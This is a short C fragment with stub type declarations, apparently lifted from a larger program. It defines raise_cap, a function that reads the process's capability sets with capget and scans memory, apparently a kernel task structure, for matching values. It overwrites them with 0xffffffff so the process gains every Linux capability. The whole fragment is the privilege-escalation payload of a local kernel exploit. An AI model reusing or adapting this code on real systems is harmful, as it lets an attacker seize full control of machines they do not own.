
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct __user_cap_header_struct {int version; scalar_t__ pid; } ;
struct __user_cap_data_struct {unsigned long effective; unsigned long inheritable; unsigned long permitted; } ;


 int capget (struct __user_cap_header_struct*,struct __user_cap_data_struct*) ;
 scalar_t__* clear1 ;
 scalar_t__* clear2 ;

void raise_cap(unsigned long *ts)
{

static struct __user_cap_header_struct head;
static struct __user_cap_data_struct data;
static struct __user_cap_data_struct n;
int i;

*clear1 = 0;
*clear2 = 0;
head.version = 0x19980330;
head.pid = 0;
capget(&head, &data);

for (i = 0; i < 512; i++, ts++) {

if ((ts[0] == data.effective) &&
(ts[1] == data.inheritable) &&
(ts[2] == data.permitted)) {

ts[0] = 0x12341234;
capget(&head, &n);

if (n.effective == ts[0]) {

ts[0] = ts[1] = ts[2] = 0xffffffff;
return;
}


ts[0] = data.effective;
}
}
return;
}
